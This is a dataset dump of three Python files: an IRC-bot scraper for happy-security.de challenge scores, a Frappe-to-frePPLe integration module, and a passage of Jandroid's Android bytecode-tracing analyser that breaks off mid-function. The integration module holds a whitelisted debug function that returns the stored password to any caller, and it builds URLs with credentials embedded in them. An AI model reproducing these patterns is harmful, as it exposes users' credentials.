text stringlengths 957 885k |
|---|
<filename>tehbot/plugins/challenge/hs.py<gh_stars>1-10
from tehbot.plugins.challenge import *
import urllib.request, urllib.error, urllib.parse
import urllib.parse
import lxml.html
import re
# Plaintext per-user scoring endpoint; response is a colon-separated line.
url1 = "http://www.happy-security.de/utilities/hotlink/userscoring.php?username=%s"
# Paginated highscore listing; %s is the 'start' offset parameter.
url2 = "http://www.happy-security.de/?modul=hacking-zone&action=highscore&start=%s&level_id="
# Per-user challenge-details page (solved/unsolved markers per challenge).
url3 = "http://www.happy-security.de/index.php?modul=hacking-zone&action=highscore_details&user=%s"
class Site(BaseSite):
    """Challenge-site scraper for happy-security.de.

    Provides user statistics, rank lookups and challenge/solver listings
    by scraping the site's HTML and plaintext endpoints.
    """

    def prefix(self):
        """Prefix used when printing results for this site."""
        return "[Happy-Security]"

    def siteurl(self):
        """Base URL of the site."""
        return "http://www.happy-security.de"

    def userstats(self, user):
        """Fetch scoring statistics for *user*.

        The endpoint returns one colon-separated line:
        rank:solved:total:users_total:contributed:username

        :returns: tuple (user, solved, solved_max, rank, user_count,
            score, score_max, extra) or None if the response is malformed
            (e.g. unknown user)
        """
        page = urllib.request.urlopen(url1 % Plugin.to_latin1(user), timeout=5).read()
        page = page.decode("latin1")
        match = page.split(":")
        if len(match) != 6:
            return None
        rank, challs_solved, challs_total, users_total, challs_contributed, user = match
        extra = None
        if int(challs_contributed) > 0:
            extra = " %s has contributed %d challenge%s." % (
                user, int(challs_contributed),
                "" if int(challs_contributed) == 1 else "s")
        if int(rank) > 1:
            # Best effort: fetch the next-higher-ranked user's stats to
            # work out how many more solves are needed to rank up.
            try:
                user2 = Site.hs_rank_to_user(int(rank) - 1)
                result = urllib.request.urlopen(
                    url1 % Plugin.to_latin1(user2), timeout=5
                ).read().decode("latin1").split(":")
                if len(result) == 6:
                    rank2, challs_solved2, challs_total2, users_total2, challs_contributed2, user2 = result
                    count = int(challs_solved2) - int(challs_solved)
                    # One extra solve is needed unless this user has
                    # contributed more challenges than the user above.
                    if int(challs_contributed) <= int(challs_contributed2):
                        count += 1
                    if extra is None:
                        extra = ""
                    extra += " %s needs to solve %d more challenge%s to rank up." % (
                        user, count, "" if count == 1 else "s")
            except Exception:
                # The rank-up hint is optional; ignore network/parse errors.
                # (Was a bare `except:` which also swallowed SystemExit etc.)
                pass
        return user, str(int(challs_solved)), int(challs_total), rank, int(users_total), None, None, extra

    @staticmethod
    def hs_rank_to_user(rank):
        """Return the username holding position *rank* in the highscore table."""
        tree = lxml.html.parse(urllib.request.urlopen(url2 % rank, timeout=3))
        rows = tree.xpath("//td[@class='middle']//table[@class='mtable']/tr")
        if len(rows) < 2:
            return ""
        # Row 0 is the header; the name is the first word in column 2.
        return rows[1].xpath("td[2]")[0].text_content().split()[0]

    def rankstats(self, rank):
        """Return (solved, [user], solved_max) for the user at *rank*."""
        res = self.userstats(Site.hs_rank_to_user(rank))
        user, solved, solvedmax, rank, usercount, score, scoremax, extra = res
        return solved, [user], solvedmax

    @staticmethod
    def parse_challs(url):
        """Scrape the challenge listing at *url*.

        :returns: dict mapping challenge number to
            (challenge name, solvers-page URL, solver count)
        """
        challs = {}
        tree = lxml.html.parse(urllib.request.urlopen(url, timeout=5))
        for e in tree.xpath("//td[@class='middle']//table[@class='mtable']/tr"):
            e2 = e.xpath("td[2]//a[1]")
            e3 = e.xpath("td[4]/a")
            if not e2 or not e3 or not e2[0].text_content() or not e3[0].text_content():
                continue
            # Fix: int() cannot consume a list; join the digit characters
            # first (previously `int(list(filter(...)))` raised TypeError).
            solvers = int("".join(filter(str.isdigit, e3[0].text_content())))
            match = re.search(r'level_id=(\d+)', e2[0].xpath("@href")[0])
            if match:
                chall_nr = int(match.group(1))
                challs[chall_nr] = (
                    e2[0].text_content().strip(),
                    urllib.parse.urljoin(url, e3[0].xpath("@href")[0]),
                    solvers,
                )
        return challs

    @staticmethod
    def get_last_solvers(url):
        """Return the list of user names on the solvers page at *url*."""
        tree = lxml.html.parse(urllib.request.urlopen(url, timeout=5))
        solvers = []
        for p in tree.xpath("//td[@class='middle']//table[@class='mtable']/tr/td[2]/a"):
            solvers.append(p.text_content().strip())
        return solvers

    @staticmethod
    def solved(user, challenge_name):
        """Return True if *user* has solved *challenge_name*."""
        tree = lxml.html.parse(urllib.request.urlopen(url3 % Plugin.to_latin1(user), timeout=3))
        for cat in tree.xpath("//td[@class='middle']//table[@class='mtable']"):
            for row in cat.xpath("tr"):
                chall_link = row.xpath("td[2]//a[1]")
                title = row.xpath("td[8]//img/@title")
                if chall_link and title and chall_link[0].text_content() == challenge_name:
                    return title[0].lower().find("solved=yes") > -1
        return False

    def solvers(self, challname, challnr, user):
        """Look up a challenge by name or number and return its solvers.

        :returns: (user, nr, name, solver_count, last_solvers, solved?)
        :raises NoSuchChallengeError: if no challenge matches
        """
        challs = Site.parse_challs("http://www.happy-security.de/index.php?modul=hacking-zone")
        nr, name, url, solvers = None, None, None, None
        if challname is not None:
            for key, val in list(challs.items()):
                # Exact-prefix match wins immediately; otherwise the last
                # substring match is kept (original behaviour preserved).
                if val[0].lower().startswith(challname.lower()):
                    nr = key
                    name, url, solvers = val
                    break
                if challname.lower() in val[0].lower():
                    nr = key
                    name, url, solvers = val
        else:
            if challnr in challs:
                nr = challnr
                name, url, solvers = challs[challnr]
        if not name:
            raise NoSuchChallengeError
        cnt = solvers
        solvers = Site.get_last_solvers(url)
        return user, nr, name, cnt, solvers, user and Site.solved(user, name)
|
<filename>production_scheduling_shrdc/production_scheduling_shrdc/doctype/frepple_integration/frepple_integration.py
# -*- coding: utf-8 -*-
# Copyright (c) 2022, DCKY and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
# import frappe
from frappe.model.document import Document
import frappe
import json
from frappe.integrations.utils import make_get_request, make_post_request, create_request_log
from frappe.utils import get_request_session
import requests
from requests.structures import CaseInsensitiveDict
from datetime import datetime
'''
Naming convention:
Get request: get_{frepple document}
Post request: post_{frepple document}
'''
class FreppleIntegration(Document):
    """Controller for the 'Frepple Integration' doctype.

    Debug/pull helpers around the frePPLe REST API.
    """

    # @frappe.whitelist()
    def get_demand(self):
        """Fetch the frePPLe demand (sales-order) list and copy the first
        record's name and due date onto this document.

        :returns: list of demand dicts as returned by frePPLe
        """
        url, headers = get_frepple_params(api='demand', filter=None)
        records = make_get_request(url, headers=headers)  # list of dicts
        first_name = records[0]['name']
        print(type(records))
        # frePPLe sends ISO-8601 timestamps; convert for the datetime field.
        due = datetime.fromisoformat(records[0]['due'])
        self.sales_order = first_name
        self.delivery_date = due
        return records

    @frappe.whitelist()
    def test(self):
        """Debug helper: print the stored password field and its type."""
        print(self.password)
        print(type(self.password))
@frappe.whitelist()
def testing(doc):
    """Debug endpoint: echo the posted document and return its password.

    :param doc: JSON string with at least a 'name' key
    :returns: the stored password of the matching Frepple Integration doc
    """
    parsed = json.loads(doc)
    print(parsed)
    record = frappe.get_doc('Frepple Integration', parsed['name'])
    print(type(record.password))
    return record.password
def make_put_request(url, auth=None, headers=None, data=None):
    """Issue an HTTP PUT through frappe's shared requests session.

    Mirrors frappe.integrations.utils.make_get_request/make_post_request.

    :param url: target URL
    :param auth: requests auth object or '' for none
    :param headers: dict of request headers
    :param data: request body (dict or serialized string)
    :returns: parsed JSON response, or a parse_qs dict for
        text/plain responses
    :raises: on any request failure (logged via frappe.log_error first)
    """
    # Fix: parse_qs was referenced below but never imported (NameError on
    # any text/plain response).
    from urllib.parse import parse_qs
    if not auth:
        auth = ''
    if not data:
        data = {}
    if not headers:
        headers = {}
    try:
        s = get_request_session()
        frappe.flags.integration_request = s.put(url, data=data, auth=auth, headers=headers)
        frappe.flags.integration_request.raise_for_status()
        if frappe.flags.integration_request.headers.get("content-type") == "text/plain; charset=utf-8":
            return parse_qs(frappe.flags.integration_request.text)
        return frappe.flags.integration_request.json()
    except Exception as exc:
        frappe.log_error()
        raise exc
# @frappe.whitelist()
# def put_demand():
# if(frappe.get_doc("Frepple Setting").frepple_integration):
# # doc = frappe.get_doc('Sales Order', doc['name']) #To get the current doc
# data = json.dumps({
# "status": "closed", #default
# })
# api = "demand/SAL-ORD-2022-00033" #equivalent sales order
# url,headers = get_frepple_params(api=api,filter=None)
# output = make_put_request(url,headers=headers, data=data)
# frappe.msgprint(
# msg='Data have been updated.',
# title='Note',
# )
# return output
@frappe.whitelist()
def get_frepple_params(api=None, filter=None):
    """Build the frePPLe REST URL and request headers from 'Frepple Setting'.

    :param api: frePPLe input table name, e.g. 'demand' (default: '')
    :param filter: query-string suffix, e.g. '?status=open' (default: '')
    :returns: (url, headers) tuple; the URL embeds basic-auth credentials
        in the netloc, e.g. http://user:pass@host/api/input/<api>/<filter>
    """
    if not api:
        api = ""  # default: the bare input API root
    if not filter:
        filter = ""
    frepple_settings = frappe.get_doc("Frepple Setting")
    host = frepple_settings.url.split("//")[1]
    # NOTE(security): credentials live in the URL because the frePPLe
    # client expects basic-auth in the netloc; never log them in clear.
    url = ("http://" + frepple_settings.username + ":"
           + frepple_settings.password + "@" + host
           + "/api/input/" + api + "/" + filter)
    headers = {
        'Content-type': 'application/json; charset=UTF-8',
        'Authorization': frepple_settings.authorization_header,
    }
    # Fix: the debug trace previously printed the clear-text password;
    # mask it before logging.
    print(url.replace(frepple_settings.password, "***", 1)
          + "-------------------------------------------------------------------------")
    return url, headers
#Testing purpose GET request
@frappe.whitelist()
def make_request():
    """Debug-only GET against a hard-coded frePPLe demand endpoint.

    :returns: parsed JSON response from the test server
    """
    # Earlier experiments used other hosts; only the last assignment was
    # ever effective, so only that endpoint is kept.
    url = 'http://192.168.0.145:5000/api/input/demand/?format=json'
    headers = {
        'Content-type': 'application/json',
        'Authorization': "<KEY>",
    }
    response = make_get_request(url, headers=headers)
    return response
'''
# api = 'string' e.g 'manufacturingorder'
# filter = '?filter' e.g 'name=SALE-ORDER-005' ,'location=SHRDC&customer=Drayang'
'''
@frappe.whitelist()
def get_manufacturingorder():
    """Fetch the manufacturing-order list from frePPLe.

    :returns: list of manufacturing-order dicts
    """
    url, headers = get_frepple_params(api='manufacturingorder', filter=None)
    orders = make_get_request(url, headers=headers)
    # Parse the first start date (ISO-8601) — kept for parity with the
    # original; also validates the timestamp format.
    datetime.fromisoformat(orders[0]['startdate'])
    return orders
@frappe.whitelist()
def post_item(doc):
    """Mirror an ERPNext Item (and its Item Group) into frePPLe's item table.

    No-op unless frePPLe integration is enabled in 'Frepple Setting'.
    :param doc: JSON string of the Item document (needs 'name')
    :returns: frePPLe response for the item POST, or None when disabled
    """
    if not frappe.get_doc("Frepple Setting").frepple_integration:
        return
    item = frappe.get_doc('Item', json.loads(doc)['name'])
    url, headers = get_frepple_params(api="item", filter=None)
    # Create the item group first so the 'owner' reference below resolves
    # without a request error.
    make_post_request(url, headers=headers,
                      data=json.dumps({"name": item.item_group}))
    # Then the actual item.
    payload = json.dumps({
        "name": item.name,
        "owner": item.item_group,
        "description": item.item_name,
        "uom": item.stock_uom,
        "cost": item.valuation_rate,
    })
    output = make_post_request(url, headers=headers, data=payload)
    frappe.msgprint(msg='Data have been exported to Frepple.', title='Note')
    return output
@frappe.whitelist()
def post_location():
    """Mirror all Companies and Warehouses into frePPLe's location table.

    No-op unless frePPLe integration is enabled in 'Frepple Setting'.
    :returns: frePPLe response for the last warehouse POST, or None
    """
    if not frappe.get_doc("Frepple Setting").frepple_integration:
        return
    url, headers = get_frepple_params(api="location", filter=None)
    # Companies first, so warehouses can reference them as owners.
    for company in frappe.db.get_list('Company', fields=['name']):
        output = make_post_request(
            url, headers=headers,
            data=json.dumps({"name": company.name}))
    warehouses = frappe.db.get_list(
        'Warehouse',
        fields=['name', 'company', 'parent_warehouse'],
    )
    for warehouse in warehouses:
        # Root warehouses are owned by the company; others by their parent.
        owner = warehouse.parent_warehouse if warehouse.parent_warehouse else warehouse.company
        output = make_post_request(
            url, headers=headers,
            data=json.dumps({"name": warehouse.name, "owner": owner}))
    frappe.msgprint(msg='Data have been exported to Frepple.', title='Note')
    return output
@frappe.whitelist()
def post_employee(doc):
    """Mirror an active ERPNext Employee into frePPLe's resource table.

    Inactive employees are skipped. No-op unless integration is enabled.
    :param doc: JSON string of the Employee document (needs 'name')
    :returns: frePPLe response for the employee POST, or None if skipped
    """
    # Fix: output was previously unbound (NameError at `return output`)
    # when integration was off or the employee was not Active.
    output = None
    if frappe.get_doc("Frepple Setting").frepple_integration:
        record = frappe.get_doc('Employee', json.loads(doc)['name'])
        if record.status == "Active":
            api = "resource"  # employees map to frePPLe resources
            url, headers = get_frepple_params(api=api, filter=None)
            # Create the parent 'Operator' resource first so the 'owner'
            # reference below resolves without a request error.
            make_post_request(url, headers=headers,
                              data=json.dumps({"name": "Operator"}))
            output = make_post_request(url, headers=headers, data=json.dumps({
                "name": record.name,
                "description": record.employee_name,
                "owner": "Operator",  # default parent
            }))
            frappe.msgprint(msg='Data have been exported to Frepple.', title='Note')
    return output
@frappe.whitelist()
def post_workstation(doc):
    """Mirror workstation names into frePPLe's resource table.

    Accepts either a BOM (exports each operation's workstation; active
    BOMs only) or a Workstation document.
    :param doc: JSON string with at least 'doctype' and 'name'
    :returns: last frePPLe response, or None if nothing was exported
    """
    # Fix: output was previously unbound (NameError at `return output`)
    # for inactive BOMs, unknown doctypes, or disabled integration.
    output = None
    if frappe.get_doc("Frepple Setting").frepple_integration:
        url, headers = get_frepple_params(api="resource", filter=None)
        temp_doc = json.loads(doc)
        if temp_doc['doctype'] == "BOM" and temp_doc['is_active']:
            # Export the workstation of every operation of an active BOM.
            bom = frappe.get_doc('BOM', temp_doc['name'])
            for row in bom.operations:
                op = frappe.get_doc('BOM Operation', row.name)  # child doctype
                output = make_post_request(
                    url, headers=headers,
                    data=json.dumps({"name": op.workstation}))
        if temp_doc['doctype'] == "Workstation":
            ws = frappe.get_doc('Workstation', temp_doc['name'])
            output = make_post_request(
                url, headers=headers,
                data=json.dumps({"name": ws.name}))
        frappe.msgprint(msg='Data have been exported to Frepple.', title='Note')
    return output
@frappe.whitelist()
def post_customer(doc):
    """Mirror an ERPNext Customer (and its group) into frePPLe's customer table.

    No-op unless frePPLe integration is enabled in 'Frepple Setting'.
    :param doc: JSON string of the Customer document (needs 'name')
    :returns: frePPLe response for the customer POST, or None when disabled
    """
    if not frappe.get_doc("Frepple Setting").frepple_integration:
        return
    customer = frappe.get_doc('Customer', json.loads(doc)['name'])
    url, headers = get_frepple_params(api="customer", filter=None)
    # Create the group-level customer first so the 'owner' reference
    # below resolves without a request error.
    make_post_request(url, headers=headers,
                      data=json.dumps({"name": customer.customer_group}))
    # Then the actual customer.
    output = make_post_request(url, headers=headers, data=json.dumps({
        "name": customer.name,
        "category": customer.customer_type,
        "owner": customer.customer_group,
    }))
    frappe.msgprint(msg='Data have been exported to Frepple.', title='Note')
    return output
@frappe.whitelist()
def post_supplier(doc):
    """Mirror an ERPNext Supplier into frePPLe's supplier table.

    No-op unless frePPLe integration is enabled in 'Frepple Setting'.
    :param doc: JSON string of the Supplier document (needs 'name')
    :returns: frePPLe response for the supplier POST, or None when disabled
    """
    if not frappe.get_doc("Frepple Setting").frepple_integration:
        return
    supplier = frappe.get_doc('Supplier', json.loads(doc)['name'])
    url, headers = get_frepple_params(api="supplier", filter=None)
    output = make_post_request(url, headers=headers, data=json.dumps({
        "name": supplier.name,
        "category": supplier.supplier_group,
    }))
    frappe.msgprint(msg='Data have been exported to Frepple.', title='Note')
    return output
@frappe.whitelist()
def post_demand(doc):
    """Export a Sales Order to frePPLe's demand table.

    NOTE(review): only the LAST Sales Order Item's qty/name ends up in the
    demand record — original behaviour kept; confirm whether one demand
    per line item is intended.
    :param doc: JSON string of the Sales Order document (needs 'name')
    :returns: frePPLe response for the demand POST, or None if skipped
    """
    # Fix: output/quantity/item were previously unbound (NameError) when
    # integration was off or the sales order had no items.
    output = None
    if frappe.get_doc("Frepple Setting").frepple_integration:
        so = frappe.get_doc('Sales Order', json.loads(doc)['name'])
        quantity = None
        item = None
        for row in so.items:
            line = frappe.get_doc('Sales Order Item', row.name)  # child doctype
            quantity = line.qty
            item = line.item_name
        if item is None:
            return output  # fix: empty order -> nothing to export
        data = json.dumps({
            "name": so.name,
            "description": "Item ordered by " + so.customer_name,  # default
            "category": "",  # default
            "subcategory": "",  # default
            "item": item,
            "customer": so.customer_name,
            "location": "SHRDC",  # default
            # delivery_date is a date; append midnight for ISO-8601 datetime
            "due": (so.delivery_date.isoformat() + "T00:00:00"),
            "status": "open",  # default
            "quantity": quantity,
            "priority": "10",  # default
        })
        url, headers = get_frepple_params(api="demand", filter=None)
        output = make_post_request(url, headers=headers, data=data)
        frappe.msgprint(msg='Data have been exported to Frepple.', title='Note')
    return output
@frappe.whitelist()
def post_skill(doc):
    """Mirror an ERPNext Skill into frePPLe's skill table.

    No-op unless frePPLe integration is enabled in 'Frepple Setting'.
    :param doc: JSON string of the Skill document (needs 'name')
    :returns: frePPLe response for the skill POST, or None when disabled
    """
    if not frappe.get_doc("Frepple Setting").frepple_integration:
        return
    skill = frappe.get_doc('Skill', json.loads(doc)['name'])
    url, headers = get_frepple_params(api="skill", filter=None)
    output = make_post_request(url, headers=headers,
                               data=json.dumps({"name": skill.name}))
    frappe.msgprint(msg='Data have been exported to Frepple.', title='Note')
    return output
@frappe.whitelist()
def post_resourceskill(doc):
    """Mirror an Employee Skill Map into frePPLe's resourceskill table.

    No-op unless frePPLe integration is enabled in 'Frepple Setting'.
    :param doc: JSON string of the Employee Skill Map document (needs 'name')
    :returns: frePPLe response for the last skill POST, or None when disabled
    """
    if not frappe.get_doc("Frepple Setting").frepple_integration:
        return
    url, headers = get_frepple_params(api="resourceskill", filter=None)
    skill_map = frappe.get_doc('Employee Skill Map', json.loads(doc)['name'])
    for row in skill_map.employee_skills:
        entry = frappe.get_doc('Employee Skill', row.name)  # child doctype
        payload = json.dumps({
            "resource": skill_map.employee,
            "location": "work in progress",
            "skill": entry.skill,
            # frePPLe priority encodes proficiency (lower = more proficient)
            "priority": 5 - entry.proficiency,
        })
        output = make_post_request(url, headers=headers, data=payload)
    frappe.msgprint(msg='Data have been exported to Frepple.', title='Note')
    return output
@frappe.whitelist()
def run_plan():
    """Trigger a frePPLe plan run via its execute API.

    :returns: frePPLe response, or None when integration is disabled
    """
    # Fix: output was previously unbound when integration was disabled.
    output = None
    if frappe.get_doc("Frepple Setting").frepple_integration:
        path = "/execute/api/runplan/?constraint=15&plantype=1&env=fcst,invplan,balancing,supply"
        frepple_settings = frappe.get_doc("Frepple Setting")
        host = frepple_settings.url.split("//")[1]
        # NOTE(security): basic-auth credentials embedded in the URL.
        url = ("http://" + frepple_settings.username + ":"
               + frepple_settings.password + "@" + host + path)
        # Fix: previously printed the clear-text password; mask it.
        print(url.replace(frepple_settings.password, "***", 1)
              + "-----------------------------------------------------------------------")
        headers = {
            'Content-type': 'application/json; charset=UTF-8',
            'Authorization': frepple_settings.authorization_header,
        }
        output = make_post_request(url, headers=headers, data=None)
        frappe.msgprint(
            msg='Plan has been run successfully',  # fix: message typos
            title='Success',
        )
    return output
# @frappe.whitelist()
# def get_demand(self):
# api = 'demand'
# # url,headers = get_frepple_params(api=api,filter=None)
# ''' With filtering'''
# filter=None
# filter="?status=open"
# url,headers = get_frepple_params(api=None,filter=filter)
# # filter = None
# ro = make_get_request(url,headers=headers)
# # dt = datetime.fromisoformat(startdate)
# name = ro[0]['name']
# print(type(ro))
# dd = ro[0]['due']
# #convert iso8601 time type to datetime.datetime type
# dt = datetime.fromisoformat(dd)
# self.delivery_date = dt
# return ro |
import os
import re
import sys
import copy
import json
import logging
import configparser
from androguard.misc import *
from androguard.core import *
from analysis_utils import AnalysisUtils
from common import Conversions, JandroidException
# Trace directions supported by CodeTraceAdvanced.
TRACE_FORWARD = 'FORWARD'
TRACE_REVERSE = 'REVERSE'
# Tri-state stop-condition markers. Note these are STRING sentinels, not
# booleans — comparisons must use these constants, never True/False.
STOP_CONDITION_TRUE = 'True'
STOP_CONDITION_FALSE = 'False'
STOP_CONDITION_MAYBE = 'Maybe'
class CodeTraceAdvanced:
"""Advanced code tracing."""
    def __init__(self, base_dir):
        """Sets paths and initialises variables.

        (Androguard objects are supplied later, per-APK, via
        fn_start_adv_trace, not here.)

        :param base_dir: string indicating script base path
        """
        # Set paths.
        self.path_base_dir = base_dir
        # Initialise special case object: when a reverse trace reaches
        # AsyncTask.doInBackground, continue from the matching execute()
        # call sites.
        self.special_case_object_list_reverse = {
            'doInBackground': {
                'Landroid/os/AsyncTask;': [
                    'execute([Ljava/lang/Object;)Landroid/os/AsyncTask;',
                    'execute(Ljava/lang/Runnable;)'
                ]
            }
        }
        # Forward counterpart: a trace through execute() continues inside
        # doInBackground.
        self.special_case_object_list_forward = {
            'execute([Ljava/lang/Object;)Landroid/os/AsyncTask;': 'doInBackground',
            'execute(Ljava/lang/Runnable;)V': 'doInBackground'
        }
        # Store returns.
        self.current_returns = []
        # String sentinel ('False'), see module-level STOP_CONDITION_* notes.
        self.stop_condition = STOP_CONDITION_FALSE
def fn_reset(self):
self.androguard_apk_obj = None
self.androguard_d_array = None
self.androguard_dx = None
self.inst_analysis_utils = None
self.all_annotations = None
    def fn_start_adv_trace(self, a, d, dx, code_trace_template, links,
                           direction=TRACE_REVERSE, max_trace_length=25):
        """Traces within code based on a trace template.

        :param a: androguard APK object for the app under analysis
        :param d: array of androguard DalvikVMFormat objects
        :param dx: androguard Analysis object
        :param code_trace_template: dictionary object corresponding to the
            trace part of a bug template
        :param links: dictionary object containing linked items
        :param direction: string indicating direction to trace
        :param max_trace_length: integer indicating maximum length for
            trace chains
        :returns: list containing a boolean value indicating whether the
            trace was satisfied, and the list of identified trace chains
            (NOTE(review): previous docstring claimed updated links were
            returned, but the code returns self.output_chains — confirm
            which is intended)
        """
        logging.debug('Performing advanced code trace.')
        # Androguard variables for this APK.
        self.androguard_apk_obj = a
        self.androguard_d_array = d
        self.androguard_dx = dx
        # Start up utility helper.
        self.inst_analysis_utils = AnalysisUtils(
            self.path_base_dir,
            self.androguard_apk_obj,
            self.androguard_d_array,
            self.androguard_dx
        )
        self.all_annotations = \
            self.inst_analysis_utils.fn_get_all_annotations()
        # Pre-compute JS-interface classes/methods (helper defined elsewhere).
        self.fn_get_jsinterface_classes_methods()
        # Linked elements from checking previous parts of the template.
        self.current_links = links
        self.trace_direction = direction
        self.trace_length_max = max_trace_length
        # Keep track of trace chains (to be converted to RETURN items).
        self.output_chains = []
        bool_satisfied = False
        # Expand the template into from/to endpoint lists, then trace every
        # (from, to) combination; any single satisfied pair satisfies all.
        self.fn_enumerate_trace_source_sinks(code_trace_template)
        for trace_from_item in self.trace_from_main_list:
            for trace_to_item in self.trace_to_main_list:
                bool_single_trace_satisfied = self.fn_trace_through_code(
                    trace_from_item,
                    trace_to_item
                )
                if bool_single_trace_satisfied == True:
                    bool_satisfied = True
        if bool_satisfied == True:
            if 'RETURN' in code_trace_template:
                self.fn_analyse_returns(code_trace_template)
        # Process returns as links.
        if bool_satisfied == True:
            self.current_links = \
                self.inst_analysis_utils.fn_convert_returns_to_links(
                    self.current_returns,
                    self.current_links
                )
        self.fn_reset()
        # Return the outcome and the links, to be used by next code segment.
        return [bool_satisfied, self.output_chains]
    def fn_trace_through_code(self, trace_from, trace_to):
        """Calls methods to parse arguments and starts trace handler.

        :param trace_from: string indicating start point(s) for trace
        :param trace_to: string indicating end point(s) for trace
        :returns: boolean indicating whether at least one path was identified
            between the start and end points
        """
        # Split each endpoint into its type qualifier ("<class>"/"<method>")
        # and the raw trace string.
        [self.from_class_method, trace_from_string] = \
            self.fn_get_trace_type(trace_from)
        [self.to_class_method, trace_to_string] = \
            self.fn_get_trace_type(trace_to)
        # Expand linked items into concrete start/end candidates.
        trace_from_list = self.fn_get_trace_items(
            trace_from_string,
            self.from_class_method
        )
        trace_to_list = self.fn_get_trace_items(
            trace_to_string,
            self.to_class_method
        )
        if ((trace_from_list == []) or (trace_to_list == [])):
            logging.debug('Either TraceFrom or TraceTo evaluated to None.')
            return False
        self.trace_to_list = trace_to_list
        return self.fn_trace_handler(trace_from_list)
def fn_trace_handler(self, trace_from_list):
"""Starts the trace process and outputs the result.
:param trace_from_list: list containing possible start points
for trace
:returns: boolean indicating whether at least one path was identified
between the start and end points
"""
for trace_from in trace_from_list:
self.checked_methods = set()
self.checked_traceto_instructions = set()
# Set a stop condition.
self.stop_condition = STOP_CONDITION_FALSE
# Start the forward or reverse tracers, based on template.
if self.trace_direction == TRACE_REVERSE:
self.fn_trace_reverse(
trace_from,
trace_from,
self.trace_from_argindex,
self.from_class_method
)
else:
self.fn_trace_forward(
trace_from,
trace_from,
self.from_class_method
)
# If the output chain list is not empty, it means at least one path
# between the start and end points was identified.
if self.output_chains != []:
return True
else:
return False
def fn_trace_forward(self, trace_from, chain, class_or_method=None):
"""Performs forward tracing.
:param trace_from: string indicating starting point for trace
:param chain: string containing comma-separated "chain links"
:param class_or_method: either "<class>" or "<method">
"""
# Get class/method/desc parts.
[class_part, method_part, desc_part] = \
self.fn_determine_class_method_desc(
trace_from,
class_or_method
)
# Include subclasses.
all_classes = \
self.inst_analysis_utils.fn_find_subclasses(class_part)
all_classes.append(class_part)
for one_class in all_classes:
combined_method_string = one_class
if '.' not in method_part:
combined_method_string = combined_method_string \
+ '->' \
+ method_part
if '.' not in desc_part:
combined_method_string = combined_method_string \
+ desc_part
method_check_string = 'e' + combined_method_string
if method_check_string in self.checked_methods:
continue
self.checked_methods.add(method_check_string)
# If the trace to type doesn't care about arguments or results
# (i.e., just a class or method),
# then perform a stop condition check.
if ((self.trace_to_type != 'RESULTOF') and
(self.trace_to_type != 'ARGTO')):
self.fn_check_generic_stop_condition(combined_method_string)
if self.stop_condition == STOP_CONDITION_TRUE:
self.output_chains.append(chain)
self.stop_condition = False
continue
# Get starting points.
starting_points = \
self.inst_analysis_utils.fn_get_calls_to_method(
one_class,
method_part,
desc_part
)
for starting_point in starting_points:
num_locals = self.fn_get_locals(starting_point)
index_reg = self.fn_identify_result_reg(
starting_point,
combined_method_string
)
if index_reg == []:
continue
for tuple in index_reg:
v_reg_trace_output = self.fn_trace_v_forward(
starting_point,
tuple[0]+1,
tuple[1],
chain
)
if v_reg_trace_output == True:
self.output_chains.append(chain)
self.stop_condition = STOP_CONDITION_FALSE
continue
else:
continue
    def fn_trace_v_forward(self, method, index, register, chain):
        """Traces a register forward from a starting point within a method.

        Walks the method's instructions from *index*, dispatching on the
        Dalvik opcode wherever *register* appears as an operand: stops when
        the register is overwritten, follows copies/field writes/invokes,
        and records a chain when the trace-to target is reached.

        :param method: Androguard EncodedMethod to trace through
        :param index: instruction index (integer) to start trace from
        :param register: integer value of register
        :param chain: string containing comma-separated "chain links"
        """
        instructions = list(method.get_instructions())
        num_instructions = len(instructions)
        num_locals = self.fn_get_locals(method)
        [c, m, d] = \
            self.inst_analysis_utils.fn_get_class_method_desc_from_method(
                method
            )
        method_string = c + '->' + m + d
        # Memoisation key: method + start index + register ('i' prefix
        # distinguishes these from other checked_methods entries).
        search_string = method_string + ':' + str(index) + ':' + str(register)
        method_check_string = 'i' + search_string + str(index) + str(register)
        if method_check_string in self.checked_methods:
            return
        self.checked_methods.add(method_check_string)
        new_chain = chain + ',' + method_string
        for i in range(index, num_instructions):
            instruction = instructions[i]
            opcode = instruction.get_op_value()
            operands = instruction.get_operands()
            for op_index, operand in enumerate(operands):
                # Only consider register-type operands (kind 0) that refer
                # to the register being traced.
                if operand[0] != 0:
                    continue
                if (register != operand[1]):
                    continue
                # move
                if (opcode in
                        [0x01, 0x02, 0x03, 0x04, 0x05,
                         0x06, 0x07, 0x08, 0x09]):
                    # If the current register (the register of interest)
                    # is in position 0, that means its value has been
                    # overwritten. Stop tracing.
                    if op_index == 0:
                        return
                    # If the current register is in position 1, then its value has been
                    # copied to another register. We should trace that register as well.
                    if op_index == 1:
                        self.fn_trace_v_forward(
                            method,
                            i+1,
                            operands[0][1],
                            chain
                        )
                # move-result.
                elif (opcode in [0x0A, 0x0B, 0x0C]):
                    # Register overwritten by a call result; stop tracing.
                    return
                # constant
                elif (opcode in
                        [0x12, 0x13, 0x14, 0x15, 0x16, 0x17,
                         0x18, 0x19, 0x1A, 0x1B, 0x1C]):
                    # Register overwritten by a constant; stop tracing.
                    return
                # aget
                elif (opcode in [0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4A]):
                    if op_index == 0:
                        return
                    # Register used as the array source; trace the
                    # destination register too.
                    if op_index == 1:
                        self.fn_trace_v_forward(
                            method,
                            i+1,
                            operands[0][1],
                            chain
                        )
                # aput
                elif (opcode in [0x4B, 0x4C, 0x4D, 0x4E, 0x4F, 0x50, 0x51]):
                    # Value stored into an array; follow the array register.
                    if op_index == 0:
                        self.fn_trace_v_forward(
                            method,
                            i+1,
                            operands[0][1],
                            chain
                        )
                    if op_index == 1:
                        return
                # iget
                elif (opcode in [0x52, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58]):
                    if op_index == 0:
                        return
                # iput
                elif (opcode in [0x59, 0x5A, 0x5B, 0x5C, 0x5D, 0x5E, 0x5F]):
                    # Value stored into an instance field; follow the field.
                    if op_index == 0:
                        iput_dest = operands[2][2]
                        self.fn_trace_field_forward(iput_dest, new_chain)
                # sget
                elif (opcode in [0x60, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66]):
                    if op_index == 0:
                        return
                # sput
                elif (opcode in [0x67, 0x68, 0x69, 0x6A, 0x6B, 0x6C, 0x6D]):
                    # Value stored into a static field; follow the field.
                    if op_index == 0:
                        sput_dest = operands[1][2]
                        self.fn_trace_field_forward(sput_dest, new_chain)
                # invoke
                elif (opcode in
